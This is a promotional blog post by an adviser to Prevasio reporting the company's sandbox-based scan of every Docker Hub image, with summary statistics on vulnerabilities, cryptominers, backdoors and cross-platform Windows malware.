Docker – a way of building applications using containers (micro-apps that are used in Lego-block fashion to build larger programs) – is taking the enterprise world by storm. With customers that count among the top technology-forward companies in the world (Netflix, AT&T, PayPal, Snowflake, Verizon, Target, and many others), it’s become the new standard in deploying highly robust and distributed applications. At the core is Docker Hub, the main universe of Docker containers, with over 4 million container images*.
So with so many enterprises and institutions running Docker, security is a concern, and we have seen the growth of security vendors like StackRox, Aqua and Snyk to answer the call. And I’m sure plenty of these vendors have done analysis of containers, but in the end, these analyses will only be a static analysis, without taking into account all of the complexities and actions that occur when one actually runs a container.
So I’m happy that today, Prevasio, a company that I’m advising, has launched the results of the first and only analysis of the entire Docker Hub. What Prevasio did is new and important: They actually went through the entire Docker Hub and ran each container to see what happens.
This is not a small task; the company spent tens of thousands of dollars in computing power to perform this task. And the way the Prevasio Analyzer works is different than any other solution on the market: At its core is a sandbox which “detonates” (executes) a container to see what actually occurs during the runtime process. This sandboxing action allows us to get a unique view into what actually occurs when one executes a container. (This is the difference between behavior analysis and static analysis – a static analysis will use a signature to determine maliciousness but can never tell what an application will actually do. For a real look, one needs to analyze behavior.)
Some of the results are troubling:
- 51 percent of all containers had “critical” vulnerabilities, while 13 percent were classified as “high” and four percent as “moderate” vulnerabilities.
- Six thousand containers were riddled with cryptominers, hacking tools/pen testing frameworks, and backdoor trojans. While many cryptominers and hacking tools may not be malicious per se, they present a potentially unwanted issue to an enterprise.
- Over 400 examples (with over 500,000 pulls) of weaponized Windows malware crossing over into the world of Linux. This crossover is directly due to the proliferation of cross-platform code (e.g. GoLang, .NET Core and PowerShell Core).
The full whitepaper is here, and Prevasio’s blog post is here.
But if you want to have some fun, Prevasio has all the data publicly available live on their site, at malware.prevasio.com. Feel free to look at the results for yourself.
*A container image is the template that creates the actual Docker containers.